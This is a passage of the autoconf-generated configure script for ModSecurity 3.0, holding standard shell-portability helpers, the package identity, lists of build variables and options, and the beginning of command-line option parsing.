_as_can_reexec=no; export _as_can_reexec; # We cannot yet assume a decent shell, so we have to provide a # neutralization value for shells without unset; and this also # works around shells that cannot unset nonexistent variables. # Preserve -v and -x to the replacement shell. BASH_ENV=/dev/null ENV=/dev/null (unset BASH_ENV) >/dev/null 2>&1 && unset BASH_ENV ENV case $- in # (((( *v*x* | *x*v* ) as_opts=-vx ;; *v* ) as_opts=-v ;; *x* ) as_opts=-x ;; * ) as_opts= ;; esac exec $CONFIG_SHELL $as_opts "$as_myself" ${1+"$@"} # Admittedly, this is quite paranoid, since all the known shells bail # out after a failed `exec'. $as_echo "$0: could not re-execute with $CONFIG_SHELL" >&2 as_fn_exit 255 fi # We don't want this to propagate to other subprocesses. { _as_can_reexec=; unset _as_can_reexec;} if test "x$CONFIG_SHELL" = x; then as_bourne_compatible="if test -n \"\${ZSH_VERSION+set}\" && (emulate sh) >/dev/null 2>&1; then : emulate sh NULLCMD=: # Pre-4.2 versions of Zsh do word splitting on \${1+\"\$@\"}, which # is contrary to our usage. Disable this feature. alias -g '\${1+\"\$@\"}'='\"\$@\"' setopt NO_GLOB_SUBST else case \`(set -o) 2>/dev/null\` in #( *posix*) : set -o posix ;; #( *) : ;; esac fi " as_required="as_fn_return () { (exit \$1); } as_fn_success () { as_fn_return 0; } as_fn_failure () { as_fn_return 1; } as_fn_ret_success () { return 0; } as_fn_ret_failure () { return 1; } exitcode=0 as_fn_success || { exitcode=1; echo as_fn_success failed.; } as_fn_failure && { exitcode=1; echo as_fn_failure succeeded.; } as_fn_ret_success || { exitcode=1; echo as_fn_ret_success failed.; } as_fn_ret_failure && { exitcode=1; echo as_fn_ret_failure succeeded.; } if ( set x; as_fn_ret_success y && test x = \"\$1\" ); then : else exitcode=1; echo positional parameters were not saved. fi test x\$exitcode = x0 || exit 1 test -x / || exit 1" as_suggested=" as_lineno_1=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_1a=\$LINENO as_lineno_2=";as_suggested=$as_suggested$LINENO;as_suggested=$as_suggested" as_lineno_2a=\$LINENO eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" && test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1 test \$(( 1 + 1 )) = 2 || exit 1 test -n \"\${ZSH_VERSION+set}\${BASH_VERSION+set}\" || ( ECHO='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' ECHO=\$ECHO\$ECHO\$ECHO\$ECHO\$ECHO ECHO=\$ECHO\$ECHO\$ECHO\$ECHO\$ECHO\$ECHO PATH=/empty FPATH=/empty; export PATH FPATH test \"X\`printf %s \$ECHO\`\" = \"X\$ECHO\" \\ || test \"X\`print -r -- \$ECHO\`\" = \"X\$ECHO\" ) || exit 1" if (eval "$as_required") 2>/dev/null; then : as_have_required=yes else as_have_required=no fi if test x$as_have_required = xyes && (eval "$as_suggested") 2>/dev/null; then : else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR as_found=false for as_dir in /bin$PATH_SEPARATOR/usr/bin$PATH_SEPARATOR$PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. as_found=: case $as_dir in #( /*) for as_base in sh bash ksh sh5; do # Try only shells that exist, to save several forks. as_shell=$as_dir/$as_base if { test -f "$as_shell" || test -f "$as_shell.exe"; } && { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$as_shell"; } 2>/dev/null; then : CONFIG_SHELL=$as_shell as_have_required=yes if { $as_echo "$as_bourne_compatible""$as_suggested" | as_run=a "$as_shell"; } 2>/dev/null; then : break 2 fi fi done;; esac as_found=false done $as_found || { if { test -f "$SHELL" || test -f "$SHELL.exe"; } && { $as_echo "$as_bourne_compatible""$as_required" | as_run=a "$SHELL"; } 2>/dev/null; then : CONFIG_SHELL=$SHELL as_have_required=yes fi; } IFS=$as_save_IFS if test "x$CONFIG_SHELL" != x; then : export CONFIG_SHELL # We cannot yet assume a decent shell, so we have to provide a # neutralization value for shells without unset; and this also # works around shells that cannot unset nonexistent variables. # Preserve -v and -x to the replacement shell. BASH_ENV=/dev/null ENV=/dev/null (unset BASH_ENV) >/dev/null 2>&1 && unset BASH_ENV ENV case $- in # (((( *v*x* | *x*v* ) as_opts=-vx ;; *v* ) as_opts=-v ;; *x* ) as_opts=-x ;; * ) as_opts= ;; esac exec $CONFIG_SHELL $as_opts "$as_myself" ${1+"$@"} # Admittedly, this is quite paranoid, since all the known shells bail # out after a failed `exec'. $as_echo "$0: could not re-execute with $CONFIG_SHELL" >&2 exit 255 fi if test x$as_have_required = xno; then : $as_echo "$0: This script requires a shell more modern than all" $as_echo "$0: the shells that I found on your system." if test x${ZSH_VERSION+set} = xset ; then $as_echo "$0: In particular, zsh $ZSH_VERSION has bugs and should" $as_echo "$0: be upgraded to zsh 4.3.4 or later." else $as_echo "$0: Please tell bug-autoconf@gnu.org and $0: security@modsecurity.org about your system, including $0: any error possibly output before this message. Then $0: install a modern shell, or manually run the script $0: under such a shell if you do have one." fi exit 1 fi fi fi SHELL=${CONFIG_SHELL-/bin/sh} export SHELL # Unset more variables known to interfere with behavior of common tools. CLICOLOR_FORCE= GREP_OPTIONS= unset CLICOLOR_FORCE GREP_OPTIONS ## --------------------- ## ## M4sh Shell Functions. ## ## --------------------- ## # as_fn_unset VAR # --------------- # Portably unset VAR. as_fn_unset () { { eval $1=; unset $1;} } as_unset=as_fn_unset # as_fn_set_status STATUS # ----------------------- # Set $? to STATUS, without forking. as_fn_set_status () { return $1 } # as_fn_set_status # as_fn_exit STATUS # ----------------- # Exit the shell with STATUS, even in a "trap 0" or "set -e" context. as_fn_exit () { set +e as_fn_set_status $1 exit $1 } # as_fn_exit # as_fn_mkdir_p # ------------- # Create "$as_dir" as a directory, including parents if necessary. as_fn_mkdir_p () { case $as_dir in #( -*) as_dir=./$as_dir;; esac test -d "$as_dir" || eval $as_mkdir_p || { as_dirs= while :; do case $as_dir in #( *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( *) as_qdir=$as_dir;; esac as_dirs="'$as_qdir' $as_dirs" as_dir=`$as_dirname -- "$as_dir" || $as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$as_dir" : 'X\(//\)[^/]' \| \ X"$as_dir" : 'X\(//\)$' \| \ X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || $as_echo X"$as_dir" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` test -d "$as_dir" && break done test -z "$as_dirs" || eval "mkdir $as_dirs" } || test -d "$as_dir" || as_fn_error $? "cannot create directory $as_dir" } # as_fn_mkdir_p # as_fn_executable_p FILE # ----------------------- # Test if FILE is an executable regular file. as_fn_executable_p () { test -f "$1" && test -x "$1" } # as_fn_executable_p # as_fn_append VAR VALUE # ---------------------- # Append the text in VALUE to the end of the definition contained in VAR. Take # advantage of any shell optimizations that allow amortized linear growth over # repeated appends, instead of the typical quadratic growth present in naive # implementations. if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : eval 'as_fn_append () { eval $1+=\$2 }' else as_fn_append () { eval $1=\$$1\$2 } fi # as_fn_append # as_fn_arith ARG... # ------------------ # Perform arithmetic evaluation on the ARGs, and store the result in the # global $as_val. Take advantage of shells that can avoid forks. The arguments # must be portable across $(()) and expr. if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : eval 'as_fn_arith () { as_val=$(( $* )) }' else as_fn_arith () { as_val=`expr "$@" || test $? -eq 1` } fi # as_fn_arith # as_fn_error STATUS ERROR [LINENO LOG_FD] # ---------------------------------------- # Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are # provided, also output the error to LOG_FD, referencing LINENO. Then exit the # script with STATUS, using 1 if that was 0. as_fn_error () { as_status=$1; test $as_status -eq 0 && as_status=1 if test "$4"; then as_lineno=${as_lineno-"$3"} as_lineno_stack=as_lineno_stack=$as_lineno_stack $as_echo "$as_me:${as_lineno-$LINENO}: error: $2" >&$4 fi $as_echo "$as_me: error: $2" >&2 as_fn_exit $as_status } # as_fn_error if expr a : '\(a\)' >/dev/null 2>&1 && test "X`expr 00001 : '.*\(...\)'`" = X001; then as_expr=expr else as_expr=false fi if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then as_basename=basename else as_basename=false fi if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then as_dirname=dirname else as_dirname=false fi as_me=`$as_basename -- "$0" || $as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ X"$0" : 'X\(//\)$' \| \ X"$0" : 'X\(/\)' \| . 2>/dev/null || $as_echo X/"$0" | sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/ q } /^X\/\(\/\/\)$/{ s//\1/ q } /^X\/\(\/\).*/{ s//\1/ q } s/.*/./; q'` # Avoid depending upon Character Ranges. as_cr_letters='abcdefghijklmnopqrstuvwxyz' as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' as_cr_Letters=$as_cr_letters$as_cr_LETTERS as_cr_digits='0123456789' as_cr_alnum=$as_cr_Letters$as_cr_digits as_lineno_1=$LINENO as_lineno_1a=$LINENO as_lineno_2=$LINENO as_lineno_2a=$LINENO eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" && test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || { # Blame Lee E. McMahon (1931-1989) for sed's syntax. :-) sed -n ' p /[$]LINENO/= ' <$as_myself | sed ' s/[$]LINENO.*/&-/ t lineno b :lineno N :loop s/[$]LINENO\([^'$as_cr_alnum'_].*\n\)\(.*\)/\2\1\2/ t loop s/-\n.*// ' >$as_me.lineno && chmod +x "$as_me.lineno" || { $as_echo "$as_me: error: cannot create $as_me.lineno; rerun with a POSIX shell" >&2; as_fn_exit 1; } # If we had to re-execute with $CONFIG_SHELL, we're ensured to have # already done that, so ensure we don't try to do so again and fall # in an infinite loop. This has already happened in practice. _as_can_reexec=no; export _as_can_reexec # Don't try to exec as it changes $[0], causing all sort of problems # (the dirname of $[0] is not the place where we might find the # original and so on. Autoconf is especially sensitive to this). . "./$as_me.lineno" # Exit status is that of the last command. exit } ECHO_C= ECHO_N= ECHO_T= case `echo -n x` in #((((( -n*) case `echo 'xy\c'` in *c*) ECHO_T=' ';; # ECHO_T is single tab character. xy) ECHO_C='\c';; *) echo `echo ksh88 bug on AIX 6.1` > /dev/null ECHO_T=' ';; esac;; *) ECHO_N='-n';; esac rm -f conf$$ conf$$.exe conf$$.file if test -d conf$$.dir; then rm -f conf$$.dir/conf$$.file else rm -f conf$$.dir mkdir conf$$.dir 2>/dev/null fi if (echo >conf$$.file) 2>/dev/null; then if ln -s conf$$.file conf$$ 2>/dev/null; then as_ln_s='ln -s' # ... but there are two gotchas: # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. # In both cases, we have to default to `cp -pR'. ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || as_ln_s='cp -pR' elif ln conf$$.file conf$$ 2>/dev/null; then as_ln_s=ln else as_ln_s='cp -pR' fi else as_ln_s='cp -pR' fi rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file rmdir conf$$.dir 2>/dev/null if mkdir -p . 2>/dev/null; then as_mkdir_p='mkdir -p "$as_dir"' else test -d ./-p && rmdir ./-p as_mkdir_p=false fi as_test_x='test -x' as_executable_p=as_fn_executable_p # Sed expression to map a string onto a valid CPP name. as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" # Sed expression to map a string onto a valid variable name. as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" SHELL=${CONFIG_SHELL-/bin/sh} test -n "$DJDIR" || exec 7<&0 &1 # Name of the host. # hostname on some systems (SVR3.2, old GNU/Linux) returns a bogus exit status, # so uname gets run too. ac_hostname=`(hostname || uname -n) 2>/dev/null | sed 1q` # # Initializations. # ac_default_prefix=/usr/local ac_clean_files= ac_config_libobj_dir=. LIBOBJS= cross_compiling=no subdirs= MFLAGS= MAKEFLAGS= # Identity of this package. PACKAGE_NAME='modsecurity' PACKAGE_TARNAME='modsecurity' PACKAGE_VERSION='3.0' PACKAGE_STRING='modsecurity 3.0' PACKAGE_BUGREPORT='security@modsecurity.org' PACKAGE_URL='' ac_default_prefix=/usr/local/modsecurity # Factoring default headers for most tests. ac_includes_default="\ #include #ifdef HAVE_SYS_TYPES_H # include #endif #ifdef HAVE_SYS_STAT_H # include #endif #ifdef STDC_HEADERS # include # include #else # ifdef HAVE_STDLIB_H # include # endif #endif #ifdef HAVE_STRING_H # if !defined STDC_HEADERS && defined HAVE_MEMORY_H # include # endif # include #endif #ifdef HAVE_STRINGS_H # include #endif #ifdef HAVE_INTTYPES_H # include #endif #ifdef HAVE_STDINT_H # include #endif #ifdef HAVE_UNISTD_H # include #endif" ac_subst_vars='am__EXEEXT_FALSE am__EXEEXT_TRUE LTLIBOBJS LIBOBJS VALGRIND_CHECK_RULES valgrind_enabled_tools valgrind_tools ENABLE_VALGRIND_sgcheck ENABLE_VALGRIND_drd ENABLE_VALGRIND_helgrind ENABLE_VALGRIND_memcheck VALGRIND_ENABLED VALGRIND_ENABLED_FALSE VALGRIND_ENABLED_TRUE VALGRIND DOXYGEN_PAPER_SIZE DX_COND_latex_FALSE DX_COND_latex_TRUE DX_COND_pdf_FALSE DX_COND_pdf_TRUE DX_PDFLATEX DX_FLAG_pdf DX_COND_ps_FALSE DX_COND_ps_TRUE DX_EGREP DX_DVIPS DX_MAKEINDEX DX_LATEX DX_FLAG_ps DX_COND_html_FALSE DX_COND_html_TRUE DX_FLAG_html DX_COND_chi_FALSE DX_COND_chi_TRUE DX_FLAG_chi DX_COND_chm_FALSE DX_COND_chm_TRUE DX_HHC DX_FLAG_chm DX_COND_xml_FALSE DX_COND_xml_TRUE DX_FLAG_xml DX_COND_rtf_FALSE DX_COND_rtf_TRUE DX_FLAG_rtf DX_COND_man_FALSE DX_COND_man_TRUE DX_FLAG_man DX_COND_dot_FALSE DX_COND_dot_TRUE DX_DOT DX_FLAG_dot DX_COND_doc_FALSE DX_COND_doc_TRUE DX_PERL DX_DOXYGEN DX_FLAG_doc DX_ENV DX_DOCDIR DX_CONFIG DX_PROJECT GLOBAL_CFLAGS AFL_FUZZER_FALSE AFL_FUZZER_TRUE GLOBAL_CPPFLAGS GLOBAL_LDADD USE_MUTEX_ON_PM_FALSE USE_MUTEX_ON_PM_TRUE BUILD_PARSER_FALSE BUILD_PARSER_TRUE EXAMPLES_FALSE EXAMPLES_TRUE TEST_UTILITIES_FALSE TEST_UTILITIES_TRUE YACC_INST BISON FLEX LEXLIB LEX_OUTPUT_ROOT LEX YFLAGS YACC MODSEC_MUTEX_ON_PM MODSEC_NO_LOGS MSC_GIT_VERSION MSC_VERSION MSC_VERSION_WITH_PATCHLEVEL MSC_VERSION_INFO MSC_BASE_DIR CXXCPP LT_SYS_LIBRARY_PATH OTOOL64 OTOOL LIPO NMEDIT DSYMUTIL MANIFEST_TOOL RANLIB DLLTOOL OBJDUMP LN_S NM ac_ct_DUMPBIN DUMPBIN LD FGREP SED host_os host_vendor host_cpu host build_os build_vendor build_cpu build LIBTOOL EGREP GREP CPP PCRE_LD_PATH PCRE_LDADD PCRE_LDFLAGS PCRE_CFLAGS PCRE_CPPFLAGS PCRE_VERSION PCRE_CONFIG LIBXML2_DISPLAY LIBXML2_FOUND LIBXML2_LDFLAGS LIBXML2_LDADD LIBXML2_CPPFLAGS LIBXML2_CFLAGS LIBXML2_VERSION LIBXML2_CONFIG CURL_DISPLAY CURL_FOUND CURL_USES_GNUTLS CURL_LDADD CURL_LDFLAGS CURL_CFLAGS CURL_CPPFLAGS CURL_VERSION CURL_CONFIG LUA_CFLAGS_FALSE LUA_CFLAGS_TRUE LUA_FOUND LUA_DISPLAY LUA_CFLAGS LUA_LDADD LUA_LDFLAGS SSDEEP_CFLAGS_FALSE SSDEEP_CFLAGS_TRUE SSDEEP_FOUND SSDEEP_DISPLAY SSDEEP_CFLAGS SSDEEP_LDADD SSDEEP_LDFLAGS LMDB_CFLAGS_FALSE LMDB_CFLAGS_TRUE LMDB_FOUND LMDB_DISPLAY LMDB_CFLAGS LMDB_LDFLAGS LMDB_LIBS LMDB_LDADD LMDB_VERSION MAXMIND_CFLAGS_FALSE MAXMIND_CFLAGS_TRUE MAXMIND_FOUND MAXMIND_DISPLAY MAXMIND_CFLAGS MAXMIND_LDFLAGS MAXMIND_LIBS MAXMIND_LDADD MAXMIND_VERSION GEOIP_CFLAGS_FALSE GEOIP_CFLAGS_TRUE GEOIP_FOUND GEOIP_DISPLAY GEOIP_CFLAGS GEOIP_LDFLAGS GEOIP_LIBS GEOIP_LDADD GEOIP_VERSION YAJL_VERSION_FALSE YAJL_VERSION_TRUE YAJL_FOUND YAJL_DISPLAY YAJL_CFLAGS YAJL_LDFLAGS YAJL_LIBS YAJL_LDADD YAJL_VERSION PKG_CONFIG_LIBDIR PKG_CONFIG_PATH PKG_CONFIG am__fastdepCC_FALSE am__fastdepCC_TRUE CCDEPMODE ac_ct_CC CFLAGS CC ac_ct_AR AR am__fastdepCXX_FALSE am__fastdepCXX_TRUE CXXDEPMODE am__nodep AMDEPBACKSLASH AMDEP_FALSE AMDEP_TRUE am__include DEPDIR OBJEXT EXEEXT ac_ct_CXX CPPFLAGS LDFLAGS CXXFLAGS CXX AM_BACKSLASH AM_DEFAULT_VERBOSITY AM_DEFAULT_V AM_V am__untar am__tar AMTAR am__leading_dot SET_MAKE AWK mkdir_p MKDIR_P INSTALL_STRIP_PROGRAM STRIP install_sh MAKEINFO AUTOHEADER AUTOMAKE AUTOCONF ACLOCAL VERSION PACKAGE CYGPATH_W am__isrc INSTALL_DATA INSTALL_SCRIPT INSTALL_PROGRAM target_alias host_alias build_alias LIBS ECHO_T ECHO_N ECHO_C DEFS mandir localedir libdir psdir pdfdir dvidir htmldir infodir docdir oldincludedir includedir localstatedir sharedstatedir sysconfdir datadir datarootdir libexecdir sbindir bindir program_transform_name prefix exec_prefix PACKAGE_URL PACKAGE_BUGREPORT PACKAGE_STRING PACKAGE_VERSION PACKAGE_TARNAME PACKAGE_NAME PATH_SEPARATOR SHELL am__quote' ac_subst_files='' ac_user_opts=' enable_option_checking enable_silent_rules enable_dependency_tracking with_yajl with_geoip with_maxmind with_lmdb with_ssdeep with_lua with_curl with_libxml with_pcre enable_shared enable_static with_pic enable_fast_install with_aix_soname with_gnu_ld with_sysroot enable_libtool_lock enable_debug_logs enable_afl_fuzz enable_examples enable_parser_generation enable_mutex_on_pm enable_doxygen_doc enable_doxygen_dot enable_doxygen_man enable_doxygen_rtf enable_doxygen_xml enable_doxygen_chm enable_doxygen_chi enable_doxygen_html enable_doxygen_ps enable_doxygen_pdf enable_valgrind enable_valgrind_memcheck enable_valgrind_helgrind enable_valgrind_drd enable_valgrind_sgcheck ' ac_precious_vars='build_alias host_alias target_alias CXX CXXFLAGS LDFLAGS LIBS CPPFLAGS CCC CC CFLAGS PKG_CONFIG PKG_CONFIG_PATH PKG_CONFIG_LIBDIR CPP LT_SYS_LIBRARY_PATH CXXCPP YACC YFLAGS DOXYGEN_PAPER_SIZE' # Initialize some variables set by options. ac_init_help= ac_init_version=false ac_unrecognized_opts= ac_unrecognized_sep= # The variables have the same names as the options, with # dashes changed to underlines. cache_file=/dev/null exec_prefix=NONE no_create= no_recursion= prefix=NONE program_prefix=NONE program_suffix=NONE program_transform_name=s,x,x, silent= site= srcdir= verbose= x_includes=NONE x_libraries=NONE # Installation directory options. # These are left unexpanded so users can "make install exec_prefix=/foo" # and all the variables that are supposed to be based on exec_prefix # by default will actually change. # Use braces instead of parens because sh, perl, etc. also accept them. # (The list follows the same order as the GNU Coding Standards.) bindir='${exec_prefix}/bin' sbindir='${exec_prefix}/sbin' libexecdir='${exec_prefix}/libexec' datarootdir='${prefix}/share' datadir='${datarootdir}' sysconfdir='${prefix}/etc' sharedstatedir='${prefix}/com' localstatedir='${prefix}/var' includedir='${prefix}/include' oldincludedir='/usr/include' docdir='${datarootdir}/doc/${PACKAGE_TARNAME}' infodir='${datarootdir}/info' htmldir='${docdir}' dvidir='${docdir}' pdfdir='${docdir}' psdir='${docdir}' libdir='${exec_prefix}/lib' localedir='${datarootdir}/locale' mandir='${datarootdir}/man' ac_prev= ac_dashdash= for ac_option do # If the previous option needs an argument, assign it. if test -n "$ac_prev"; then eval $ac_prev=\$ac_option ac_prev= continue fi case $ac_option in *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;; *=) ac_optarg= ;; *) ac_optarg=yes ;; esac # Accept the important Cygnus configure options, so we can diagnose typos. case $ac_dashdash$ac_option in --) ac_dashdash=yes ;; -bindir | --bindir | --bindi | --bind | --bin | --bi) ac_prev=bindir ;; -bindir=* | --bindir=* | --bindi=* | --bind=* | --bin=* | --bi=*) bindir=$ac_optarg ;; -build | --build | --buil | --bui | --bu) ac_prev=build_alias ;; -build=* | --build=* | --buil=* | --bui=* | --bu=*) build_alias=$ac_optarg ;; -cache-file | --cache-file | --cache-fil | --cache-fi \ | --cache-f | --cache- | --cache | --cach | --cac | --ca | --c) ac_prev=cache_file ;; -cache-file=* | --cache-file=* | --cache-fil=* | --cache-fi=* \ | --cache-f=* | --cache-=* | --cache=* | --cach=* | --cac=* | --ca=* | --c=*) cache_file=$ac_optarg ;; --config-cache | -C) cache_file=config.cache ;; -datadir | --datadir | --datadi | --datad) ac_prev=datadir ;; -datadir=* | --datadir=* | --datadi=* | --datad=*) datadir=$ac_optarg ;; -datarootdir | --datarootdir | --datarootdi | --datarootd | --dataroot \ | --dataroo | --dataro | --datar) ac_prev=datarootdir ;; -datarootdir=* | --datarootdir=* | --datarootdi=* | --datarootd=* \ | --dataroot=* | --dataroo=* | --dataro=* | --datar=*) datarootdir=$ac_optarg ;; -disable-* | --disable-*) ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid feature name: $ac_useropt" ac_useropt_orig=$ac_useropt ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "enable_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--disable-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval enable_$ac_useropt=no ;; -docdir | --docdir | --docdi | --doc | --do) ac_prev=docdir ;; -docdir=* | --docdir=* | --docdi=* | --doc=* | --do=*) docdir=$ac_optarg ;; -dvidir | --dvidir | --dvidi | --dvid | --dvi | --dv) ac_prev=dvidir ;; -dvidir=* | --dvidir=* | --dvidi=* | --dvid=* | --dvi=* | --dv=*) dvidir=$ac_optarg ;; -enable-* | --enable-*) ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'` # Reject names that are not valid shell variable names. expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && as_fn_error $? "invalid feature name: $ac_useropt" ac_useropt_orig=$ac_useropt ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` case $ac_user_opts in *" "enable_$ac_useropt" "*) ;; *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--enable-$ac_useropt_orig" ac_unrecognized_sep=', ';; esac eval enable_$ac_useropt=\$ac_optarg ;; -exec-prefix | --exec_prefix | --exec-prefix | --exec-prefi \ | --exec-pref | --exec-pre | --exec-pr | --exec-p | --exec- \ | --exec | --exe | --ex) ac_prev=exec_prefix ;; -exec-prefix=* | --exec_prefix=* | --exec-prefix=* | --exec-prefi=* \ | --exec-pref=* | --exec-pre=* | --exec-pr=* | --exec-p=* | --exec-=* \ | --exec=* | --exe=* | --ex=*) exec_prefix=$ac_optarg ;; -gas | --gas | --ga | --g) # Obsolete; use --with-gas. with_gas=yes ;; -help | --help | --hel | --he | -h) ac_init_help=long ;; -help=r* | --help=r* | --hel=r* | --he=r* | -hr*) ac_init_help=recursive ;; -help=s* | --help=s* | --hel=s* | --he=s* | -hs*) ac_init_help=short ;; -host | --host | --hos | --ho) ac_prev=host_alias ;; -host=* | --host=* | --hos=* | --ho=*) host_alias=$ac_optarg ;; -htmldir | --htmldir | --htmldi | --htmld | --html | --htm | --ht) ac_prev=htmldir ;; -htmldir=* | --htmldir=* | --htmldi=* | --htmld=* | --html=* | --htm=* \ | --ht=*) htmldir=$ac_optarg ;; -includedir | --includedir | --includedi | --included | --include \ | --includ | --inclu | --incl | --inc) ac_prev=includedir ;; -includedir=* | --includedir=* | --includedi=* | --included=* | --include=* \ | --includ=* | --inclu=* | --incl=* | --inc=*) includedir=$ac_optarg ;; -infodir | --infodir | --infodi | --infod | --info | --inf) ac_prev=infodir ;; -infodir=* | --infodir=* | --infodi=* | --infod=* | --info=* | --inf=*) infodir=$ac_optarg ;; -libdir | --libdir | --libdi | --libd) ac_prev=libdir ;; -libdir=* | --libdir=* | --libdi=* | --libd=*) libdir=$ac_optarg ;; -libexecdir | --libexecdir | --libexecdi | --libexecd | --libexec \ | --libexe | --libex | --libe) ac_prev=libexecdir ;; -libexecdir=* | --libexecdir=* | --libexecdi=* | --libexecd=* | --libexec=* \ | --libexe=* | --libex=* | --libe=*) libexecdir=$ac_optarg ;; -localedir | --localedir | --localedi | --localed | --locale) ac_prev=localedir ;; -localedir=* | --localedir=* | --localedi=* | --localed=* | --locale=*) localedir=$ac_optarg ;; -localstatedir | --localstatedir | --localstatedi | --localstated \ | --localstate | --localstat | --localsta | --localst | --locals) ac_prev=localstatedir ;; -localstatedir=* | --localstatedir=* | --localstatedi=* | --localstated=* \ | --localstate=* | --localstat=* | --localsta=* | --localst=* | --locals=*) localstatedir=$ac_optarg ;; -mandir | --mandir | --mandi | --mand | --man | --ma | --m) ac_prev=mandir ;; -mandir=* | --mandir=* | --mandi=* | --mand=* | --man=* | --ma=* | --m=*) mandir=$ac_optarg ;; -nfp | --nfp | --nf) # Obsolete; use --without-fp. with_fp=no ;; -no-create | --no-create | --no-creat | --no-crea | --no-cre \ | --no-cr | --no-c | -n) no_create=yes ;; -no-recursion | --no-recursion | --no-recursio | --no-recursi \ | --no-recurs | --no-recur | --no-recu | --no-rec | --no-re | --no-r) no_recursion=yes ;; -oldincludedir | --oldincludedir | --oldincludedi | --oldincluded \ | --oldinclude | --oldinclud | --oldinclu | --oldincl | --oldinc \ | --oldin | --oldi | --old | --ol | --o) ac_prev=oldincludedir ;; -oldincludedir=* | --oldincludedir=* | --oldincludedi=* | --oldincluded=* \ | --oldinclude=* | --oldinclud=* | --oldinclu=* | --oldincl=* | --oldinc=* \ | --oldin=* | --oldi=* | --old=* | --ol=* | --o=*) oldincludedir=$ac_optarg ;; -prefix | --prefix | --prefi | --pref | --pre | --pr | --p) ac_prev=prefix ;; -prefix=* | --prefix=* | --prefi=* | --pref=* | --pre=* | --pr=* | --p=*) prefix=$ac_optarg ;; -program-prefix | --program-prefix | --program-prefi | --program-pref \ | --program-pre | --program-pr | --program-p) ac_prev=program_prefix ;; -program-prefix=* | --program-prefix=* | --program-prefi=* \ | --program-pref=* | --program-pre=* | --program-pr=* | --program-p=*) program_prefix=$ac_optarg ;; -program-suffix | --program-suffix | --program-suffi | --program-suff \ | --program-suf | --program-su | --program-s) ac_prev=program_suffix ;; -program-suffix=* | --program-suffix=* | --program-suffi=* \ | --program-suff=* | --program-suf=* | --program-su=* | --program-s=*) program_suffix=$ac_optarg ;; -program-transform-name | --program-transform-name \ | --program-transform-nam | --program-transform-na \ | --program-transform-n | --program-transform- \ | --program-transform | --program-transfor \ | --program-transfo | --program-transf \ | --program-trans | --program-tran \ | --progr-tra | --program-tr | --program-t) ac_prev=program_transform_name ;; -program-transform-name=* | --program-transform-name=* \ | --program-transform-nam=* | --program-transform-na=* \ | --program-transform-n=* | --program-transform-=* \ | --program-transform=* | --program-transfor=* \ | --program-transfo=* | --program-transf=* \ | --program-trans=* | --program-tran=* \ | --progr-tra=* | --program-tr=* | --program-t=*) program_transform_name=$ac_optarg ;; -pdfdir | --pdfdir | --pdfdi | --pdfd | --pdf | --pd) ac_prev=pdfdir ;; -pdfdir=* | --pdfdir=* | --pdfdi=* | --pdfd=* | --pdf=* | --pd=*) pdfdir=$ac_optarg ;; -psdir | --psdir | --psdi | --psd | --ps) ac_prev=psdir ;; -psdir=* | --psdir=* | --psdi=* | --psd=* | --ps=*) psdir=$ac_optarg ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil) silent=yes ;; -sbindir | --sbindir | --sbindi | --sbind | --sbin | --sbi | --sb) ac_prev=sbindir ;; -sbindir=* | --sbindir=* | --sbindi=* | --sbind=* | --sbin=* \ | --sbi=* | --sb=*) sbindir=$ac_optarg ;; -sharedstatedir | 